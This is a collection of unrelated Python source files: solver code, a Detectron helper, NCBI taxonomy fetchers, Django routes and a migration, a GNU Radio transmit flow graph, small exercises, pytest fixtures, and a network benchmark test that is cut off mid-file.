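# solves (H + lambda*I) s = -g, and secular(lambda) = 1/delta - 1/||s(lambda)||,
# so brentq finds the lambda >= max(0, -min(e)) at which ||s(lambda)|| = delta,
# i.e. the step lands exactly on the trust-region boundary.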
def _pcg_output_check(output: Status) -> None:
pass
N = dyn_typing.SizeVar()
assertNoInfNaN_proj: Callable[[typing.proj_t], None] = assertNoInfNaN
@dyn_typing.dyn_check_4(
input=(
dyn_typing.Class(QuadEvaluator),
typing.DynT_Constraints(N),
dyn_typing.Float(),
dyn_typing.NDArray(numpy.float64, (N, N)),
),
output=dyn_typing.Class(Status),
)
@bind_checker.bind_checker_4(
input=bind_checker.make_checker_4(
no_check_QPeval,
constraint_check,
assertNoInfNaN_float,
assertNoInfNaN_proj,
),
output=_pcg_output_check,
)
def quad_prog(
qpval: QuadEvaluator,
constraints: typing.constraints_t,
delta: float,
proj: typing.proj_t,
) -> Status:
g, H = qpval.g, qpval.H
d, flag = _implimentation(qpval, delta)
x_interp = circular_interp(proj @ -g, proj @ d)
x_clip, violate, index = clip_solution(x_interp, g, H, constraints, delta)
angle = index / (x_interp.shape[1] - 1)
if violate:
flag = Flag.CONSTRAINT
return status.make_status(x_clip, angle, flag, delta, qpval)
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Environment helper functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
# Default value of the CMake install prefix
_CMAKE_INSTALL_PREFIX = '/usr/local'
def get_runtime_dir():
"""Retrieve the path to the runtime directory."""
return os.getcwd()
def get_py_bin_ext():
"""Retrieve python binary extension."""
return '.py'
def set_up_matplotlib():
"""Set matplotlib up."""
import matplotlib
# Use a non-interactive backend
matplotlib.use('Agg')
def exit_on_error():
"""Exit from a detectron tool when there's an error."""
sys.exit(1)
|
import sys
import logging as log
from Bio import Entrez
from urllib.error import HTTPError
from .data_models import Taxon
def fetch_taxonomic_info(user_email: str, taxon: Taxon, retries: int) -> None:
"""Receives a Taxon object and tries to fetch its full taxonomic classification information
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
taxon.classification = {}
try:
query = Entrez.efetch(db="taxonomy", id=taxon.taxon_id, retmode="xml")
parsed = Entrez.read(query)
taxonomic_info = parsed[0]["LineageEx"]
for taxon_level in taxonomic_info:
if taxon_level["Rank"] == "no rank":
if "no rank" not in list(taxon.classification):
taxon.classification[taxon_level["Rank"]] = []
taxon.classification[taxon_level["Rank"]].append(
taxon_level["ScientificName"])
else:
taxon.classification[taxon_level["Rank"]
] = taxon_level["ScientificName"]
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (HTTPError):
log.warning("\nWARNING: Connection error while trying to fetch the taxonomic information "
f"for {taxon.name}. It could be due to a lack of internet connection or a broken response "
"from the NCBI servers. Ignoring this taxon for now")
taxon.missing_classification = True
except (IndexError):
log.warning("\nWARNING: Couldn't find the taxonomic information for "
f"organism '{taxon.name}'")
taxon.missing_classification = True
except (Exception):
log.warning("\nWARNING: Unknown error occurred while trying to fetch the taxonomic "
f"information for organism '{taxon.name}'. It could be due to TaIGa reaching the maximum "
"number of retries or issues with the NCBI servers. Maybe wait and try again a "
"bit later")
taxon.missing_classification = True
def fetch_correct_spelling(user_email: str, taxon: Taxon, retries: int) -> None:
"""Receives a Taxon object and tries to fetch a correct name for it from NCBI
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
try:
query = Entrez.espell(db="taxonomy", term=taxon.name)
parsed = Entrez.read(query)
corrected_name = parsed["CorrectedQuery"]
if (len(corrected_name) == 0):
log.warning(
f"\nWARNING: Couldn't find the correct organism name for '{taxon.name}'")
taxon.missing_corrected = True
else:
taxon.name = corrected_name
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (RuntimeError):
log.warning(
f"\nWARNING: Couldn't find the correct organism name for '{taxon.name}'")
taxon.missing_corrected = True
except (Exception):
log.warning("\nWARNING: Unknown error occurred while trying to correct the spelling for "
f"organism '{taxon.name}'")
taxon.missing_corrected = True
def fetch_id_from_name(user_email: str, db: str, taxon: Taxon, retries: int) -> None:
"""Fetches either the Taxon ID or the Genome ID for a Taxon object, using the taxon's name
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
db (string): The database the function should try to fetch the information from. If the value
is 'genome', it will search Genome for a Genome ID. If it is 'taxonomy', it will
search Taxonomy for a Taxon ID
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
if not taxon.missing_name:
query = Entrez.esearch(db=db, term=taxon.name, retmode="xml")
parsed = Entrez.read(query)
if db == "taxonomy":
try:
taxon_id = parsed["IdList"][0]
taxon.taxon_id = int(taxon_id)
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (IndexError):
log.warning(
f"\nWARNING: Couldn't find a valid Taxon ID for the organism '{taxon.name}'")
taxon.missing_taxon_id = True
except (Exception):
log.warning("\nWARNING: Unknown error occurred while trying to find a valid Taxon "
f"ID for organism '{taxon.name}'")
taxon.missing_taxon_id = True
elif db == "genome":
try:
genome_id = parsed["IdList"][-1]
taxon.genome_id = int(genome_id)
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (IndexError):
log.warning(f"\nWARNING: Couldn't find a Genome ID for oragnism '{taxon.name}'. It probably "
"doesn't have one available on NCBI")
except (NameError):
log.warning(f"\nWARNING: No Genome ID found for organism '{taxon.taxon_id}'. TaIGa probably "
"didn't find the organism name for this Taxon ID")
except (Exception):
log.warning("\nWARNING: An unknown error occurred while searching Taxonomy for the "
f"Genome ID of '{taxon.taxon_id}'")
else:
log.warning(
f"\nWARNING: Taxon {taxon.taxon_id} is missing a name. Not searching for Taxon or Genome ID")
def fetch_name_from_taxon_id(user_email: str, taxon: Taxon, retries: int) -> None:
"""Receives a Taxon object and tries to fetch a name for it from its Taxon ID
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
try:
query = Entrez.efetch(db="taxonomy", id=taxon.taxon_id, retmode="xml")
parsed = Entrez.read(query)
name = parsed[0]["ScientificName"]
taxon.name = name
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (IndexError):
log.warning(
f"\nWARNING: Couldn't find an organism name for '{taxon.taxon_id}'")
taxon.missing_name = True
except (Exception):
log.warning("\nWARNING: An unknown error occurred while searching Taxonomy for the name of "
f"organism '{taxon.taxon_id}'")
taxon.missing_name = True
|
from django.urls import path
from apps.profesores.views import add_profesores, edit_profesores, delete_profesores, lista_profesores, ProfesoresList, DetalleProfesor, DeleteProfesor
urlpatterns = [
path('profesor/crear/', add_profesores, name='add_profesores'),
path('profesor/<int:pk>/editar/', edit_profesores, name='edit_profesores'),
path('profesor/<int:pk>/eliminar/', DeleteProfesor.as_view(), name='delete_profesores'),
path('profesor/<int:pk>/detalle/', DetalleProfesor.as_view(), name='read_profesores'),
path('profesores/listar/', lista_profesores, name='lista_profesores'),
path('api/profesores/listar/', ProfesoresList.as_view()),
]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Tx Scram Rand
# Generated: Thu May 25 18:27:40 2017
##################################################
if __name__ == '__main__':
import ctypes
import sys
if sys.platform.startswith('linux'):
try:
x11 = ctypes.cdll.LoadLibrary('libX11.so')
x11.XInitThreads()
except:
print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from gnuradio import blocks
from gnuradio import digital
from gnuradio import eng_notation
from gnuradio import gr
from gnuradio import qtgui
from gnuradio import uhd
from gnuradio.eng_option import eng_option
from gnuradio.filter import firdes
from optparse import OptionParser
import kiss
import numpy
import pmt
import sip
import sys
import time
import vtgs
from gnuradio import qtgui
class tx_scram_rand(gr.top_block, Qt.QWidget):
def __init__(self, addr='127.0.0.1', alpha=0.5, bb_gain=.45, port='4000', samp_rate=500e3, samps_per_symb=4, tx_correct=0, tx_freq=2395e6, tx_gain=20, tx_offset=0, tx_period=44, update_period=2000):
gr.top_block.__init__(self, "Tx Scram Rand")
Qt.QWidget.__init__(self)
self.setWindowTitle("Tx Scram Rand")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "tx_scram_rand")
self.restoreGeometry(self.settings.value("geometry").toByteArray())
##################################################
# Parameters
##################################################
self.addr = addr
self.alpha = alpha
self.bb_gain = bb_gain
self.port = port
self.samp_rate = samp_rate
self.samps_per_symb = samps_per_symb
self.tx_correct = tx_correct
self.tx_freq = tx_freq
self.tx_gain = tx_gain
self.tx_offset = tx_offset
self.tx_period = tx_period
self.update_period = update_period
##################################################
# Blocks
##################################################
self.vtgs_mult_scrambler_0 = vtgs.mult_scrambler(17, 0x3FFFF)
self.uhd_usrp_sink_0 = uhd.usrp_sink(
",".join(("", "")),
uhd.stream_args(
cpu_format="fc32",
channels=range(1),
),
)
self.uhd_usrp_sink_0.set_samp_rate(samp_rate)
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(tx_freq+tx_correct, tx_offset), 0)
self.uhd_usrp_sink_0.set_gain(tx_gain, 0)
self.uhd_usrp_sink_0.set_antenna('TX/RX', 0)
self.qtgui_freq_sink_x_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0.set_update_time(0.10)
self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0.enable_grid(False)
self.qtgui_freq_sink_x_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0.enable_control_panel(False)
if not True:
self.qtgui_freq_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)
self.top_layout.addWidget(self._qtgui_freq_sink_x_0_win)
self.kiss_hdlc_framer_0 = kiss.hdlc_framer(preamble_bytes=50, postamble_bytes=7)
self.digital_map_bb_0 = digital.map_bb((1,0))
self.digital_gfsk_mod_0 = digital.gfsk_mod(
samples_per_symbol=samps_per_symb,
sensitivity=1.0,
bt=0.35,
verbose=False,
log=False,
)
self.blocks_stream_mux_0 = blocks.stream_mux(gr.sizeof_char*1, (768,5232))
self.blocks_random_pdu_0 = blocks.random_pdu(256, 256, chr(0xFF), 2)
self.blocks_pdu_to_tagged_stream_0_0 = blocks.pdu_to_tagged_stream(blocks.byte_t, 'packet_len')
self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(8)
self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vcc((bb_gain, ))
self.blocks_message_strobe_0_0 = blocks.message_strobe(pmt.intern("TEST"), tx_period)
self.blocks_message_strobe_0 = blocks.message_strobe(pmt.intern("TEST"), update_period)
self.analog_random_source_x_0 = blocks.vector_source_b(map(int, numpy.random.randint(0, 1, 768)), True)
##################################################
# Connections
##################################################
self.msg_connect((self.blocks_message_strobe_0, 'strobe'), (self.blocks_random_pdu_0, 'generate'))
self.msg_connect((self.blocks_message_strobe_0_0, 'strobe'), (self.kiss_hdlc_framer_0, 'in'))
self.msg_connect((self.blocks_random_pdu_0, 'pdus'), (self.blocks_message_strobe_0_0, 'set_msg'))
self.msg_connect((self.kiss_hdlc_framer_0, 'out'), (self.blocks_pdu_to_tagged_stream_0_0, 'pdus'))
self.connect((self.analog_random_source_x_0, 0), (self.blocks_stream_mux_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.qtgui_freq_sink_x_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.uhd_usrp_sink_0, 0))
self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.digital_gfsk_mod_0, 0))
self.connect((self.blocks_pdu_to_tagged_stream_0_0, 0), (self.blocks_stream_mux_0, 1))
self.connect((self.blocks_stream_mux_0, 0), (self.digital_map_bb_0, 0))
self.connect((self.digital_gfsk_mod_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self.digital_map_bb_0, 0), (self.vtgs_mult_scrambler_0, 0))
self.connect((self.vtgs_mult_scrambler_0, 0), (self.blocks_pack_k_bits_bb_0, 0))
def closeEvent(self, event):
self.settings = Qt.QSettings("GNU Radio", "tx_scram_rand")
self.settings.setValue("geometry", self.saveGeometry())
event.accept()
def get_addr(self):
return self.addr
def set_addr(self, addr):
self.addr = addr
def get_alpha(self):
return self.alpha
def set_alpha(self, alpha):
self.alpha = alpha
def get_bb_gain(self):
return self.bb_gain
def set_bb_gain(self, bb_gain):
self.bb_gain = bb_gain
self.blocks_multiply_const_vxx_0.set_k((self.bb_gain, ))
def get_port(self):
return self.port
def set_port(self, port):
self.port = port
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.uhd_usrp_sink_0.set_samp_rate(self.samp_rate)
self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)
def get_samps_per_symb(self):
return self.samps_per_symb
def set_samps_per_symb(self, samps_per_symb):
self.samps_per_symb = samps_per_symb
def get_tx_correct(self):
return self.tx_correct
def set_tx_correct(self, tx_correct):
self.tx_correct = tx_correct
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_freq(self):
return self.tx_freq
def set_tx_freq(self, tx_freq):
self.tx_freq = tx_freq
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_gain(self):
return self.tx_gain
def set_tx_gain(self, tx_gain):
self.tx_gain = tx_gain
self.uhd_usrp_sink_0.set_gain(self.tx_gain, 0)
def get_tx_offset(self):
return self.tx_offset
def set_tx_offset(self, tx_offset):
self.tx_offset = tx_offset
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_period(self):
return self.tx_period
def set_tx_period(self, tx_period):
self.tx_period = tx_period
self.blocks_message_strobe_0_0.set_period(self.tx_period)
def get_update_period(self):
return self.update_period
def set_update_period(self, update_period):
self.update_period = update_period
self.blocks_message_strobe_0.set_period(self.update_period)
def argument_parser():
parser = OptionParser(usage="%prog: [options]", option_class=eng_option)
parser.add_option(
"", "--addr", dest="addr", type="string", default='127.0.0.1',
help="Set addr [default=%default]")
parser.add_option(
"", "--alpha", dest="alpha", type="eng_float", default=eng_notation.num_to_str(0.5),
help="Set alpha [default=%default]")
parser.add_option(
"", "--bb-gain", dest="bb_gain", type="eng_float", default=eng_notation.num_to_str(.45),
help="Set bb_gain [default=%default]")
parser.add_option(
"", "--port", dest="port", type="string", default='4000',
help="Set port [default=%default]")
parser.add_option(
"", "--samp-rate", dest="samp_rate", type="eng_float", default=eng_notation.num_to_str(500e3),
help="Set samp_rate [default=%default]")
parser.add_option(
"", "--samps-per-symb", dest="samps_per_symb", type="eng_float", default=eng_notation.num_to_str(4),
help="Set samps_per_symb [default=%default]")
parser.add_option(
"", "--tx-correct", dest="tx_correct", type="eng_float", default=eng_notation.num_to_str(0),
help="Set tx_correct [default=%default]")
parser.add_option(
"", "--tx-freq", dest="tx_freq", type="eng_float", default=eng_notation.num_to_str(2395e6),
help="Set tx_freq [default=%default]")
parser.add_option(
"", "--tx-gain", dest="tx_gain", type="eng_float", default=eng_notation.num_to_str(20),
help="Set tx_gain [default=%default]")
parser.add_option(
"", "--tx-offset", dest="tx_offset", type="eng_float", default=eng_notation.num_to_str(0),
help="Set tx_offset [default=%default]")
parser.add_option(
"", "--tx-period", dest="tx_period", type="eng_float", default=eng_notation.num_to_str(44),
help="Set tx_period [default=%default]")
parser.add_option(
"", "--update-period", dest="update_period", type="eng_float", default=eng_notation.num_to_str(2000),
help="Set update_period [default=%default]")
return parser
def main(top_block_cls=tx_scram_rand, options=None):
if options is None:
options, _ = argument_parser().parse_args()
from distutils.version import StrictVersion
if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
style = gr.prefs().get_string('qtgui', 'style', 'raster')
Qt.QApplication.setGraphicsSystem(style)
qapp = Qt.QApplication(sys.argv)
tb = top_block_cls(addr=options.addr, alpha=options.alpha, bb_gain=options.bb_gain, port=options.port, samp_rate=options.samp_rate, samps_per_symb=options.samps_per_symb, tx_correct=options.tx_correct, tx_freq=options.tx_freq, tx_gain=options.tx_gain, tx_offset=options.tx_offset, tx_period=options.tx_period, update_period=options.update_period)
tb.start()
tb.show()
def quitting():
tb.stop()
tb.wait()
qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
qapp.exec_()
if __name__ == '__main__':
main()
|
# nihaoya  ("hi there")
# heihie   ("hehe")
num = 10000000
mun = 200
mun = 500
|
# Generated by Django 3.2.4 on 2021-06-28 10:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('spaces', '0003_auto_20210628_1133'),
]
operations = [
migrations.AlterField(
model_name='spaces',
name='available',
            field=models.BooleanField(default=True, null=True),
),
]
|
from time import sleep
def contador(inicio, fim, passo):
print('-=' * 25)
if passo == 0:
passo = 1
passo = abs(passo)
    print(f'Counting from {inicio} to {fim} in steps of {passo}:')
if inicio < fim:
for i in range(inicio, fim + 1, passo):
print(i, end=' ')
sleep(0.3)
        print('END!!!')
elif inicio > fim:
for i in range(inicio, fim - 1, -passo):
print(i, end=' ')
sleep(0.3)
        print('END!!!')
else:
        return print('Start and end are equal, there is nothing to count!')
contador(1, 10, 1)
contador(10, 0, 2)
print('Now it is your turn to customize the count!')
inicio = int(input('Start: '))
fim = int(input('End: '))
passo = int(input('Step: '))
contador(inicio, fim, passo)
|
import os
import re
import json
import base64
import numpy as np
from collections import defaultdict
import db_connection as db_con
def parse_groups(group_filename, vectors_encoded=True):
f = open(group_filename)
groups = json.load(f)
for key in groups:
for group in groups[key]:
for key in group['elements']:
if group['type'] == 'categorial':
if vectors_encoded:
group['elements'][key]['vector'] = np.fromstring(base64.decodestring(
bytes(group['elements'][key]['vector'], 'ascii')), dtype='float32')
else:
group['elements'][key]['vector'] = group['elements'][key]['vector']
if 'inferred_elements' in group:
if group['type'] == 'categorial':
for key in group['inferred_elements']:
if vectors_encoded:
group['inferred_elements'][key]['vector'] = np.fromstring(base64.decodestring(
bytes(group['inferred_elements'][key]['vector'], 'ascii')), dtype='float32')
else:
group['inferred_elements'][key]['vector'] = group['inferred_elements'][key]['vector']
return groups
def get_data_columns_from_group_data(groups):
result = set()
for key in groups:
if groups[key][0]['type'] == 'categorial':
result.add(key)
return list(result)
def get_column_data_from_label(label, type):
if type == 'column':
try:
table_name, column_name = label.split('.')
return table_name, column_name
        except ValueError:
            print('ERROR: Cannot decode %s into table name and column name' %
                  (label))
return
if type == 'relation':
try:
c1, c2 = label.split('~')
c1_table_name, c1_column_name = c1.split('.')
c2_table_name, c2_column_name = c2.split('.')
return c1_table_name, c1_column_name, c2_table_name, c2_column_name
        except ValueError:
            print('ERROR: Cannot decode relation label %s ' % (label))
return
def get_label(x, y): return '%s#%s' % (x, y)
def tokenize_sql_variable(name):
return "regexp_replace(%s, '[\.#~\s\xa0,\(\)/\[\]:]+', '_', 'g')" % (name)
def tokenize(term):
if type(term) == str:
        return re.sub(r'[\.#~\s,\(\)/\[\]:]+', '_', str(term))
else:
return ''
def get_terms(columns, con, cur):
result = dict()
for column in columns:
table_name, column_name = column.split(
'.') # TODO get this in an encoding save way
# construct sql query
sql_query = "SELECT %s FROM %s" % (column_name, table_name)
cur.execute(sql_query)
result[column] = [tokenize(x[0]) for x in cur.fetchall()]
result[column] = list(set(result[column])) # remove duplicates
return result
def construct_index_lookup(list_obj):
result = dict()
for i in range(len(list_obj)):
result[list_obj[i]] = i
return result
def get_dist_params(vectors):
    # returns the distribution parameters for the vector elements
m_value = 0
count = 0
values = []
for key in vectors:
max_inst = 0
for term in vectors[key]:
m_value += np.mean(vectors[key][term])
values.extend([x for x in vectors[key][term]])
max_inst += 1
count += 1
if max_inst > 100:
break
m_value /= count
s_value = np.mean((np.array(values) - m_value)**2)
return m_value, s_value
def execute_threads_from_pool(thread_pool, verbose=False):
while(len(thread_pool) > 0):
try:
next = thread_pool.pop()
if verbose:
print('Number of threads:', len(thread_pool))
next.start()
next.join()
except:
print("Warning: threadpool.pop() failed")
return
def get_vectors_for_present_terms_from_group_file(data_columns, groups_info):
result_present = dict()
dim = 0
for column in data_columns:
group = groups_info[column][0]['elements']
group_extended = groups_info[column][0]['inferred_elements']
result_present[column] = dict()
for term in group:
result_present[column][term] = np.array(
group[term]['vector'], dtype='float32')
dim = len(result_present[column][term])
for term in group_extended:
result_present[column][term] = np.array(
group_extended[term]['vector'], dtype='float32')
dim = len(result_present[column][term])
return result_present, dim
def get_terms_from_vector_set(vec_table_name, con, cur):
QUERY_TMPL = "SELECT word, vector, id FROM %s WHERE id >= %d AND id < %d"
BATCH_SIZE = 500000
term_dict = dict()
min_id = 0
max_id = BATCH_SIZE
while True:
query = QUERY_TMPL % (vec_table_name, min_id, max_id)
cur.execute(query)
term_list = [x for x in cur.fetchall()]
if len(term_list) < 1:
break
for (term, vector, freq) in term_list:
splits = term.split('_')
current = [term_dict, None, -1]
i = 1
while i <= len(splits):
subterm = '_'.join(splits[:i])
if subterm in current[0]:
current = current[0][subterm]
else:
current[0][subterm] = [dict(), None, -1]
current = current[0][subterm]
i += 1
current[1] = vector
current[2] = freq
min_id = max_id
max_id += BATCH_SIZE
return term_dict
|
"""Test configuration."""
import asyncio
import functools
import pathlib
from typing import Any
from typing import AsyncGenerator
from typing import Generator
import pytest
import pytz
from _pytest.monkeypatch import MonkeyPatch
from aiohttp.client import ClientSession
from aioresponses import aioresponses
from click.testing import CliRunner
@pytest.fixture
async def websession() -> AsyncGenerator[ClientSession, None]:
"""Fixture for generating ClientSession."""
async with ClientSession() as aiohttp_session:
yield aiohttp_session
closed_event = create_aiohttp_closed_event(aiohttp_session)
await aiohttp_session.close()
await closed_event.wait()
@pytest.fixture(autouse=True)
def mocked_responses() -> aioresponses:
"""Fixture for mocking aiohttp responses."""
with aioresponses() as m:
yield m
@pytest.fixture
def cli_runner(
monkeypatch: MonkeyPatch, tmpdir: pathlib.Path
) -> Generator[CliRunner, None, None]:
"""Fixture for invoking command-line interfaces."""
runner = CliRunner()
monkeypatch.setattr("os.path.expanduser", lambda x: x.replace("~", str(tmpdir)))
def get_test_zone() -> Any:
# Get a non UTC zone. Let's use Paris.
return pytz.timezone("Europe/Paris")
monkeypatch.setattr("tzlocal.get_localzone", get_test_zone)
yield runner
def create_aiohttp_closed_event(
session: ClientSession,
) -> asyncio.Event: # pragma: no cover
"""Work around aiohttp issue that doesn't properly close transports on exit.
See https://github.com/aio-libs/aiohttp/issues/1925#issuecomment-639080209
Args:
session (ClientSession): session for which to generate the event.
Returns:
An event that will be set once all transports have been properly closed.
"""
transports = 0
all_is_lost = asyncio.Event()
def connection_lost(exc, orig_lost): # type: ignore
nonlocal transports
try:
orig_lost(exc)
finally:
transports -= 1
if transports == 0:
all_is_lost.set()
def eof_received(orig_eof_received): # type: ignore
try:
orig_eof_received()
except AttributeError:
# It may happen that eof_received() is called after
# _app_protocol and _transport are set to None.
pass
for conn in session.connector._conns.values(): # type: ignore
for handler, _ in conn:
proto = getattr(handler.transport, "_ssl_protocol", None)
if proto is None:
continue
transports += 1
orig_lost = proto.connection_lost
orig_eof_received = proto.eof_received
proto.connection_lost = functools.partial(
connection_lost, orig_lost=orig_lost
)
proto.eof_received = functools.partial(
eof_received, orig_eof_received=orig_eof_received
)
if transports == 0:
all_is_lost.set()
return all_is_lost
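# Hedged usage sketch (not part of the original fixtures): outside of pytest, the same
# shutdown workaround can be applied directly. The coroutine name and URL below are
# illustrative assumptions, not names defined in this module.
#
#     import asyncio
#     from aiohttp import ClientSession
#
#     async def fetch_status(url: str) -> int:
#         session = ClientSession()
#         try:
#             async with session.get(url) as resp:
#                 return resp.status
#         finally:
#             # Mirror the websession fixture: wait until all SSL transports have
#             # really closed before letting the event loop shut down.
#             closed_event = create_aiohttp_closed_event(session)
#             await session.close()
#             await closed_event.wait()
#
#     # asyncio.run(fetch_status("https://example.com"))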
|
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for ntttcp_benchmark."""
import os
import unittest
from absl import flags
import parameterized
from perfkitbenchmarker import sample
from perfkitbenchmarker import test_util
from perfkitbenchmarker.windows_packages import ntttcp
FLAGS = flags.FLAGS
FLAGS.mark_as_parsed()
NtttcpConf = ntttcp.NtttcpConf
class NtttcpBenchmarkTestCase(unittest.TestCase, test_util.SamplesTestMixin):
def getDataContents(self, file_name):
path = os.path.join(os.path.dirname(__file__), '..', 'data', file_name)
with open(path) as fp:
contents = fp.read()
return contents
def setUp(self):
super(NtttcpBenchmarkTestCase, self).setUp()
self.xml_tcp_send_results = self.getDataContents('ntttcp_tcp_sender.xml')
self.xml_tcp_rec_results = self.getDataContents('ntttcp_tcp_receiver.xml')
self.xml_udp_send_results = self.getDataContents('ntttcp_udp_sender.xml')
self.xml_udp_rec_results = self.getDataContents('ntttcp_udp_receiver.xml')
def testNtttcpTcpParsing(self):
samples = ntttcp.ParseNtttcpResults(self.xml_tcp_send_results,
self.xml_tcp_rec_results, {})
expected_metadata = {
'async': 'False',
'bind_sender': 'False',
'cooldown_time': '30000',
'dash_n_timeout': '10800000',
'max_active_threads': '2',
'no_sync': 'False',
'port': '5003',
'receiver avg_bytes_per_compl': '149.998',
'receiver avg_frame_size': '1266.217',
'receiver avg_packets_per_dpc': '0.598',
'receiver avg_packets_per_interrupt': '0.379',
'receiver bufferCount': '9223372036854775807',
'receiver bufferLen': '150',
'receiver cpu': '36.872',
'receiver cycles': '89.055',
'receiver dpcs': '48156.278',
'receiver errors': '1',
'receiver interrupts': '75870.499',
'receiver io': '2',
'receiver packets_received': '1726938',
'receiver packets_retransmitted': '4',
'receiver packets_sent': '1092640',
'receiver realtime': '60.015000',
'receiver rb': -1,
'receiver sb': -1,
'receiver threads_avg_bytes_per_compl': '149.998',
'receiver throughput': '291.484',
'receiver total_buffers': '14577858.000',
'receiver total_bytes': '2085.379314',
'recv_socket_buff': '-1',
'run_time': '60000',
'sender avg_bytes_per_compl': '150.000',
'sender avg_frame_size': '751.222',
'sender avg_packets_per_dpc': '1.064',
'sender avg_packets_per_interrupt': '0.516',
'sender bufferCount': '9223372036854775807',
'sender bufferLen': '150',
